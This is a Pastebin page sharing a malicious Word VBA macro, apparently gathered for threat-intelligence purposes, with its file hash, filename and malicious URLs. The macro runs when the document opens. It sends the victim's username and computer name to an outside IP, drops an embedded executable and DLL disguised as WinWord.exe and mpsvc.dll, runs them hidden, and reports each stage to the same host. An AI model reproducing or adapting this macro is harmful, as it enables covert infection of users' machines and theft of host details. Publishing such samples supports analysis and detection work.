Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Malicious Macro from - https://twitter.com/ClearskySec/status/1110941178231484417
- # Filehash: 67dafac37ca130af3f818ab927ad5bcc
- # Size: 18623
- # Filename: Timelines - ECRL.docx
- # Malurls
- # - http://167.99.72.82/main.dotm - Malicious DOCM
- # - http://195.12.50.168/D2_de2o@sp0/ - C2
- Rem Attribute VBA_ModuleType=VBADocumentModule
- Option VBASupport 1
- Option Explicit
- #If VBA7 Then
- Private Declare PtrSafe Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
- Private Declare PtrSafe Function EmptyClipboard Lib "user32" () As Long
- Private Declare PtrSafe Function CloseClipboard Lib "user32" () As Long
- #Else
- Private Declare Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
- Private Declare Function EmptyClipboard Lib "user32" () As Long
- Private Declare Function CloseClipboard Lib "user32" () As Long
- #End If
- Private Sub Document_Open()
- On Error Resume Next
- Dim iShape As Shape
- Dim EmbeddedEXEFileName As String
- Dim EmbeddedDllFileName As String
- Dim OutPutEXEName As String
- Dim OutPutDllName As String
- Dim DLLReleased As Boolean
- Dim EXEReleased As Boolean
- Dim sHostName As String
- Dim sUserName As String
- Dim myurl As String
- Dim MyRequest As Object
- Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
- sHostName = Environ$("computername")
- sUserName = Environ$("username")
- myurl = "http://1167.99.72.82/index.html?u=" + sUserName + "&h=" + sHostName
- MyRequest.Open "GET", _
- myurl
- MyRequest.Send
- EmbeddedEXEFileName = "189acd0ce3b06b9193ce"
- EmbeddedDllFileName = "663f2fe952b29a8d14f5"
- OutPutEXEName = Environ("localappdata") + "\Microsoft\Windows\WinWord.exe"
- OutPutDllName = Environ("localappdata") + "\Microsoft\Windows\mpsvc.dll"
- DLLReleased = False
- EXEReleased = False
- For Each iShape In ActiveDocument.Shapes
- If iShape.Name = EmbeddedEXEFileName Then
- iShape.Select
- Selection.Copy
- FileCopy Environ("TMP") & "\" & EmbeddedEXEFileName, OutPutEXEName
- EXEReleased = True
- myurl = "http://1167.99.72.82/index.html?a=exe"
- MyRequest.Open "GET", _
- myurl
- MyRequest.Send
- ElseIf iShape.Name = EmbeddedDllFileName Then
- iShape.Select
- Selection.Copy
- FileCopy Environ("TMP") & "\" & EmbeddedDllFileName, OutPutDllName
- DLLReleased = True
- MyRequest.Open "GET", _
- myurl
- MyRequest.Send
- ElseIf iShape.Name = "4862e6f290cff1334b77" Then
- 'MsgBox "Show Normal Content -> " & iShape.Name
- iShape.Visible = msoFalse
- ActiveDocument.Content.Font.Hidden = False
- End If
- Next iShape
- If DLLReleased = True And EXEReleased = True Then
- Shell OutPutEXEName, vbHide
- myurl = "http://1167.99.72.82/index.html?a=run"
- MyRequest.Open "GET", _
- myurl
- MyRequest.Send
- End If
- OpenClipboard (0&)
- EmptyClipboard
- CloseClipboard
- End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement